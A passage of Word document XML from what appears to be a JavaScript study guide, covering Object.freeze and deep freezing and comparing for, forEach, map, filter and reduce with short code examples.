          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>You can use Object.isFrozen() to check if an object is frozen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7446E613"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person = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF554BF"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'John',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C10852"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30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C68D899"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D4A693B"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AB3DBD2"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Object.freeze(person);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3104C388"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ECE13BF"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console.log(Object.isFrozen(person)); // true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D849F8" w14:textId="77777777" w:rsidR="00412E5C" w:rsidRPr="00DA2F32" w:rsidRDefault="00412E5C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Deep Freezing Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9AA928" w14:textId="77777777" w:rsidR="00412E5C" w:rsidRPr="00DA2F32" w:rsidRDefault="00412E5C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Since Object.freeze() only performs a shallow freeze, nested objects need to be frozen separately if you want to make them immutable as well. Here’s a simple implementation of deep freezing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45585775"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deepFreeze(obj) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6920037C"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Retrieve the property names defined on obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C32A00A"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propNames = Object.getOwnPropertyNames(obj);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D325A01"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FB39EF2"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Freeze properties before freezing the object itself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E587CE"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for (const name of propNames) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68978DCD"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value = obj[name];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1927D282"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obj[name] = value &amp;&amp; typeof value === 'object' ? deepFreeze(value) : value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C38152"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244F431"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A58C7A0"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Object.freeze(obj);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEF3E6F"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73B052A"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E41D1C1"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nestedObject = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E18CD7A"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'John',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588F9E9B"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address: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C47F9F"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city: 'New York',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4560AC09"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zip: '10001'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B4B4BB"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7862D25"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17EBBA9"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5F2065A"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deepFreeze(nestedObject);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EAA13C"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4383BEA"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Attempt to modify the nested object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5F2D90"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nestedObject.address.city = 'Los Angeles'; // This will not work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A63D7EF" w14:textId="77777777"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526E692" w14:textId="3FEB4E6F" w:rsidR="00412E5C" w:rsidRPr="00DA2F32" w:rsidRDefault="00412E5C"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console.log(nestedObject); // { name: 'John', address: { city: 'New York', zip: '10001' } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D74A70" w14:textId="6314A334" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc178383258"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is V8 JavaScript engine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="29D88096" w14:textId="77777777" w:rsidR="007F0334" w:rsidRPr="00DA2F32" w:rsidRDefault="007F0334" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57EBFA90" w14:textId="2028C282" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc178383259"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is destructuring assignment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="53E0BC4D" w14:textId="77777777" w:rsidR="007F0334" w:rsidRPr="00DA2F32" w:rsidRDefault="007F0334" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A79B60D" w14:textId="1080EABE" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc178383260"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are streams</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="514B4B7E" w14:textId="77777777" w:rsidR="007F0334" w:rsidRPr="00DA2F32" w:rsidRDefault="007F0334" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E5E362" w14:textId="420165ED" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc178383261"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is JWT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="5C34A1A6" w14:textId="77777777" w:rsidR="007F0334" w:rsidRPr="00DA2F32" w:rsidRDefault="007F0334" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32F7D2D8" w14:textId="1D4B8D0C" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc178383262"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the difference between for, foreach, map, filter and reduce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="39F1E95C"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1. for Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10925334"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Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588EB121" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The traditional for loop allows complete control over iteration, making it the most flexible but also the most manual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752E2483" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>It is generally the fastest among the loop options because it has minimal overhead and direct access to the index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063BBA84"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6F166C" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="669"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fastest</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> since it doesn’t require the creation of callback functions and avoids additional operations associated with methods like map or reduce.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBBF71E"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2203F11F" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="670"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ideal for scenarios where maximum control is required over iteration, including break/continue statements or when modifying the array during iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C460716"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2174CAAD"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array = [1, 2, 3, 4, 5];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189007F2"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for (let i = 0; i &lt; array.length; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688D921F"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console.log(array[i] * 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2BACD8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD4B222"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2. forEach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C2A9D4"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Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF9FDEF" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Executes a provided function once for each array element. It doesn’t return anything (undefined).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408FA473"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A49589" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="672"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Slightly slower than the for loop because of the overhead of invoking a callback function for each element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020986BC"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4282853B" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="673"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Useful when you want to iterate over an array for side effects (e.g., logging, modifying external variables) without needing a returned array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A85CBC9"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array = [1, 2, 3, 4, 5];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E7E019"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array.forEach((num) =&gt; console.log(num * 2));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5973E6"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3. map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BFEFC8"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Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025EB276" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="674"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Creates a new array by applying a function to every element of the original array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F11470"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA9CFAE" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Similar in speed to forEach but with the additional cost of creating a new array. Slower than for loops because of extra array allocation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6990F927"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B32B87" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use map when you want to transform an array into a new array based on each element of the original array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1067B427"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array = [1, 2, 3, 4, 5];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7576FC74"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doubled = array.map(num =&gt; num * 2); // [2, 4, 6, 8, 10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4741CE"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4. filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B44472"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Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB27D43" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="677"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Creates a new array with elements that pass a specified test implemented by a provided function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097C67DC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A9185A" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="678"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Typically slower than for and forEach because it also involves creating a new array and evaluating each element against a condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6617D55D"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B61321E" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use filter when you need to extract a subset of elements that meet certain criteria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA29C38"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array = [1, 2, 3, 4, 5];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12500DC7"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evenNumbers = array.filter(num =&gt; num % 2 === 0); // [2, 4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77355894"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5. reduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54942A9D"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Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5333A4D2" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="680"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Applies a function to accumulate array elements into a single value (e.g., sum, product, object, or even another array).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F46F9AE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E58FE8" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="681"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Usually slower than the for loop due to the complexity of the accumulation process and the need for the callback function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE8F52"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5D2709" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="682"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use reduce when you need to combine all elements into a single result (e.g., sum of elements, creating an object from an array).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A6CCF3"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array = [1, 2, 3, 4, 5];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E116091"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sum = array.reduce((acc, num) =&gt; acc + num, 0); // 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175ED87A"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Final Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA37E10"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lastRenderedPageBreak/>
        <w:t>Performance differences are often negligible for smaller arrays. As the array size increases, the differences become more noticeable. However, unless performance is a bottleneck, it's usually better to choose the method that makes your code more readable and maintainable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C47BE2"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6. for...in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D16943"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Description:</w:t>
      </w:r>
    </w:p>
